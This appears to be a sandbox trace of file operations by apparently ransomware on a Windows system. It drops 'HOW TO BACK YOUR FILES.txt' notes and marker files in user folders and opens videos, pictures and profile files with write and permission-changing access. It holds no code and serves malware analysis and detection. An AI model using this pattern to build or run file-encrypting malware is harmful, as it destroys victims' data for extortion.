Create C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-tw.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Windows10Upgrade\resources\amd64\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\amd64\BiosBlocks.xml desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\amd64\hwcompat.txt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\amd64\hwexclude.txt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\amd64\nxquery.cat desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\amd64\nxquery.inf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\amd64\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Windows10Upgrade\dll2\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\dll2\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Windows10Upgrade\2052\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\2052\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\Videos\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Videos\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\Pictures\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Pictures\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\Music\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Music\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\Libraries\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Libraries\RecordedTV.library-ms desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Libraries\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\Downloads\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Downloads\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\Documents\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Documents\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\Desktop\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Desktop\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\AccountPictures\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\AccountPictures\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Videos\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\54be.flv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\7GblG1j-U_m.avi desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Videos\tKr\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\tKr\hafWBqXU o.swf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\tKr\LgD6JoRdSVkauQ4AZ.mkv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\tKr\p_iTlT1Y7Bmx3OF.swf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\tKr\SOffZObMNcI-W_M.mkv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\tKr\VCm0_y.mkv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\tKr\W681BwserRy_0.avi desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\tKr\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Videos\Mr9We2Kb5L1oUgPF84r\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\Mr9We2Kb5L1oUgPF84r\l0I0AT.swf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\Mr9We2Kb5L1oUgPF84r\_cqQP-g.mkv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\Mr9We2Kb5L1oUgPF84r\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Videos\kyLFwyj3y_- AKUbu7HT\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\kyLFwyj3y_- AKUbu7HT\1NoZ-i.avi desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\kyLFwyj3y_- AKUbu7HT\4-CHQqK1j2.avi desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\kyLFwyj3y_- AKUbu7HT\JPgmUVeD.mp4 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\kyLFwyj3y_- AKUbu7HT\Ui7VnDgLzhug.flv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\kyLFwyj3y_- AKUbu7HT\VuG piDpw9ji.mkv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\kyLFwyj3y_- AKUbu7HT\znnVwfJyK03KyEgu5yk.flv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\kyLFwyj3y_- AKUbu7HT\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Videos\Kagr0\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\Kagr0\BDCHN3cxOVU.avi desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\Kagr0\G50GPz.flv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\Kagr0\tRYgRmfMiyo_fA kpl4-.flv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\Kagr0\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Videos\IGecK\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\IGecK\2YT7 9HWKP 1.swf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\IGecK\Dl_2E.mp4 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\IGecK\tPmIDjSq0JZ6KPmq.mp4 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\IGecK\WwiHK0yV6.flv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\IGecK\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Videos\ahcaYgdd_uS\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\ahcaYgdd_uS\2SeeX7efa.avi desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\ahcaYgdd_uS\dIBFcA.flv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\ahcaYgdd_uS\Hs7jFAf-QpkayKL1.mp4 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\ahcaYgdd_uS\qIBn Mru7Ws.mkv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\ahcaYgdd_uS\rGivFa1k09POnyHrPjNR.avi desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\ahcaYgdd_uS\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Searches\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Searches\Everywhere.search-ms desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\Searches\Indexed Locations.search-ms desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\Searches\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Searches\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Saved Games\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Saved Games\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Pictures\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\0E0w6TbFOV.gif desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\0Y8YAfgHZ37VsZ3R.bmp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\1duD457p.jpg desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\1XaE_kKDx5.gif desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\4JN5OJk27EA8luclUdN4.jpg desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
